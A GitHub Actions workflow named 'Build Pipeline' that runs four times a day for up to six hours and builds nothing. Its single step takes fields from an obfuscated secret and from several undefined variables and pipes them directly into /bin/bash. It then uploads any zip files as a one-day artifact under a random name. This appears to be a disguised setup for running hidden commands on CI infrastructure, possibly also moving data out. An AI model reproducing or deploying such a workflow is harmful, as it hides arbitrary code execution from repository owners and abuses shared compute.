name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '22 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          xhkt8: ${{ secrets.xhkt8 }}
        run: |
          printf '%s' "$xhkt8" | jq -r .o7 | /bin/bash
          printf '%s' "$cvip6" | jq -r .lhtd6 | /bin/bash
          echo $oxc6 | jq -r .wsgyh1 | /bin/bash
          echo $zygk0006 | jq -r .ulf2 | /bin/bash
          printf '%s' "$fk027" | jq -r .ecnc44562 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: ei4NttVt
          path: "*.zip"
          retention-days: 1
